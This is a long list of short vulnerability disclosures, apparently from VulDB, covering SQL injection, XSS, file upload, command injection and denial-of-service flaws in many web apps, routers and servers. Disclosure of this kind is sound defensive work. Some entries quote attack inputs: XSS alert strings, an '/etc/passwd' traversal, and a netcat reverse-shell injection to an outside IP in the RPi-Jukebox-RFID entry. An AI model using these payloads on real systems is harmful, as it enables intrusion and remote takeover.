A vulnerability was found in SourceCodester Sentiment Based Movie Rating System 1.0. It has been classified as critical. Affected is an unknown function of the file /msrps/movie_details.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The initial researcher disclosure mentions a slightly changed product name.
A vulnerability has been found in PHPGurukul Boat Booking System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/edit-subadmin.php of the component Edit Subdomain Details Page. The manipulation of the argument sadminusername/fullname/emailid/mobilenumber leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "mobilenumber" to be affected. But it must be assumed that other parameters are affected as well.
A vulnerability, which was classified as critical, was found in PHPGurukul Boat Booking System 1.0. This affects an unknown part of the file change-image.php of the component Update Boat Image Page. The manipulation of the argument image leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in PHPGurukul Boat Booking System 1.0. Affected by this issue is some unknown functionality of the file /admin/bwdates-report-details.php of the component BW Dates Report Page. The manipulation of the argument fdate/tdate leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "fdate" to be affected. But it must be assumed "tdate" is affected as well.
A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in PHPGurukul Boat Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/profile.php of the component My Profile Page. The manipulation of the argument sadminusername/fullname/emailid/mobilenumber leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The initial researcher advisory only mentions the parameter "mobilenumber" to be affected. But it must be assumed that other parameters are affected as well.
A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /admin/password-recovery.php of the component Reset Your Password Page. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/index.php of the component Sign In Page. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in PHPGurukul Boat Booking System 1.0. It has been classified as problematic. This affects an unknown part of the file book-boat.php?bid=1 of the component Book a Boat Page. The manipulation of the argument phone_number leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in PHPGurukul Boat Booking System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file status.php of the component Check Booking Status Page. The manipulation of the argument emailid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in PHPGurukul Boat Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file book-boat.php?bid=1 of the component Book a Boat Page. The manipulation of the argument nopeople leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in code-projects Blood Bank System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /viewrequest.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in jsbroks COCO Annotator 0.11.1. This affects an unknown part of the component Session Handler. The manipulation of the argument SECRET_KEY leads to predictable from observable state. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in code-projects Pharmacy Management System 1.0. Affected by this issue is some unknown functionality of the file /manage_supplier.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in code-projects Pharmacy Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /add_new_supplier.php. The manipulation of the argument name leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Pharmacy Management System 1.0. Affected is an unknown function of the file /add_new_purchase.php?action=is_supplier. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /manage_medicine.php?action=delete. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /manage_invoice.php. The manipulation of the argument invoice_number leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in HFO4 shudong-share up to 2.4.7. This affects an unknown part of the file /includes/create_share.php of the component Share Handler. The manipulation of the argument fkey leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been rated as problematic. Affected by this issue is some unknown functionality of the file td.js.gz. The manipulation leads to risky cryptographic algorithm. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been classified as problematic. Affected is an unknown function of the file /InnerRepPlus.html of the component Operator Details Form. The manipulation leads to missing password field masking. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in wfh45678 Radar up to 1.0.8 and classified as critical. This issue affects some unknown processing of the component Interface Handler. The manipulation with the input /../ leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This appears not to be a path traversal weakness. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in wfh45678 Radar up to 1.0.8 and classified as critical. This vulnerability affects unknown code of the file /services/v1/common/upload. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280.
A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279.
A vulnerability, which was classified as critical, was found in VSO ConvertXtoDvd 7.0.0.83. Affected is an unknown function in the library avcodec.dll of the file ConvertXtoDvd.exe. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276.
A vulnerability was found in OpenSight Software FlashFXP 5.4.0.3970. It has been classified as critical. Affected is an unknown function in the library libcrypto-1_1.dll of the file FlashFXP.exe. The manipulation leads to uncontrolled search path. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, has been found in code-projects Pharmacy Management System 1.0. This issue affects some unknown processing of the file /php/manage_medicine_stock.php. The manipulation of the argument name/packing/generic_name/suppliers_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in code-projects Pharmacy Management System 1.0. This vulnerability affects unknown code of the file /php/add_new_medicine.php. The manipulation of the argument name/packing/generic_name/suppliers_name leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in code-projects Pharmacy Management System 1.0. This affects an unknown part of the file /php/manage_supplier.php?action=search. The manipulation of the argument text leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in code-projects Pharmacy Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /php/manage_purchase.php?action=search&amp;tag=VOUCHER_NUMBER. The manipulation of the argument text leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected is an unknown function of the file /runtime/log. The manipulation leads to improper output neutralization for logs. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252252. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in CodeAstro Stock Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /index.php of the component Add Category Handler. The manipulation of the argument Category Name/Category Description leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252203.
** DISPUTED ** A vulnerability, which was classified as problematic, has been found in NetBox up to 3.7.0. This issue affects some unknown processing of the file /core/config-revisions of the component Home Page Configuration. The manipulation with the input &lt;&lt;h1 onload=alert(1)&gt;&gt;test&lt;/h1&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. The associated identifier of this vulnerability is VDB-252191. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical was found in 60IndexPage up to 1.8.5. This vulnerability affects unknown code of the file /apply/index.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252190 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as critical has been found in 60IndexPage up to 1.8.5. This affects an unknown part of the file /include/file.php of the component Parameter Handler. The manipulation of the argument url leads to server-side request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252189 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Totolink N350RT 9.3.5u.6255. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252187. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Totolink N200RE V5 9.3.5u.6255_B20211224. It has been classified as problematic. Affected is an unknown function of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. VDB-252186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Novel-Plus 4.3.0-RC1 and classified as critical. This issue affects some unknown processing of the file /novel/bookComment/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-252185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Byzoro Smart S210 Management Platform up to 20240117 and classified as critical. This vulnerability affects unknown code of the file /Tool/uploadfile.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in Tongda OA 2017 up to 11.9. This affects an unknown part of the file /general/email/inbox/delete_webmail.php. The manipulation of the argument WEBBODY_ID_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-252183. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Niushop B2B2C V5 and classified as critical. Affected by this issue is some unknown functionality of the file \app\model\Upload.php. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252140. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in D-Link DIR-816 A2 1.10CNB04 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /goform/setDeviceSettings of the component Web Interface. The manipulation of the argument statuscheckpppoeuser leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252139.
A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in hongmaple octopus 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument description with the input &lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The associated identifier of this vulnerability is VDB-252043.
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/dept/edit. The manipulation of the argument ancestors leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. VDB-252042 is the identifier assigned to this vulnerability.
A vulnerability was found in Kmint21 Golden FTP Server 2.02b and classified as problematic. This issue affects some unknown processing of the component PASV Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252041 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in BORGChat 1.0.0 Build 438. This affects an unknown part of the component Service Port 7551. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252039.
A vulnerability, which was classified as problematic, has been found in Mafiatic Blue Server 1.1. Affected by this issue is some unknown functionality of the component Connection Handler. The manipulation leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252038 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Poikosoft EZ CD Audio Converter 8.0.7. Affected by this vulnerability is an unknown functionality of the component Activation Handler. The manipulation of the argument Key leads to denial of service. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier VDB-252037 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036.
A vulnerability was found in qwdigital LinkWechat 5.1.0. It has been classified as problematic. This affects an unknown part of the file /linkwechat-api/common/download/resource of the component Universal Download Interface. The manipulation of the argument name with the input /profile/../../../../../etc/passwd leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252033 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Qidianbang qdbcrm 1.1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /user/edit?id=2 of the component Password Reset. The manipulation leads to cross-site request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252032. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in hongmaple octopus 1.0. It has been classified as critical. Affected is an unknown function of the file /system/role/list. The manipulation of the argument dataScope leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The identifier of this vulnerability is VDB-251700.
A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.
A vulnerability has been found in CodeAstro Online Railway Reservation System 1.0 and classified as problematic. This vulnerability affects unknown code of the file pass-profile.php. The manipulation of the argument First Name/Last Name/User Name leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251698 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in CodeAstro Internet Banking System 1.0. This affects an unknown part of the file pages_client_signup.php. The manipulation of the argument Client Full Name with the input &lt;meta http-equiv="refresh" content="0; url=https://vuldb.com" /&gt; leads to open redirect. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251697 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in LinZhaoguan pb-cms 2.0. Affected by this issue is some unknown functionality of the component Comment Handler. The manipulation with the input &lt;div onmouseenter="alert("xss)"&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251678 is the identifier assigned to this vulnerability.
A vulnerability was found in Any-Capture Any Sound Recorder 2.93. It has been declared as problematic. This vulnerability affects unknown code of the component Registration Handler. The manipulation of the argument User Name/Key Code leads to memory corruption. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. VDB-251674 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in CodeAstro Internet Banking System 1.0. Affected by this vulnerability is an unknown functionality of the file pages_client_signup.php. The manipulation of the argument Client Full Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251677 was assigned to this vulnerability.
A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in D-Link DIR-859 1.06B01. It has been rated as critical. Affected by this issue is some unknown functionality of the file /hedwig.cgi of the component HTTP POST Request Handler. The manipulation of the argument service with the input ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251666 is the identifier assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.
A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.
A vulnerability classified as problematic has been found in EFS Easy File Sharing FTP 3.6. This affects an unknown part of the component Login. The manipulation of the argument password leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251559.
A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.
A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.
A vulnerability was found in PCMan FTP Server 2.0.7 and classified as problematic. This issue affects some unknown processing of the component STOR Command Handler. The manipulation leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251555.
A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as problematic. This vulnerability affects unknown code of the component PUT Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251554 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.
A vulnerability, which was classified as critical, has been found in ForU CMS up to 2020-06-23. Affected by this issue is some unknown functionality of the file cms_admin.php. The manipulation of the argument a_name leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251552.
A vulnerability classified as problematic was found in ForU CMS up to 2020-06-23. Affected by this vulnerability is an unknown functionality of the file channel.php. The manipulation of the argument c_cmodel leads to file inclusion. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251551.
A vulnerability was found in Project Worlds Student Project Allocation System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file admin_login.php of the component Admin Login Module. The manipulation of the argument msg with the input test%22%3Cscript%3Ealert(%27Torada%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251549 was assigned to this vulnerability.
A vulnerability was found in ProSSHD 1.2 on Windows. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251548.
A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.
A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.
A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.
A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in Byzoro Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability was found in Byzoro Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
A vulnerability has been found in Novel-Plus 4.3.0-RC1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /novel/bookSetting/list. The manipulation of the argument sort leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251383.
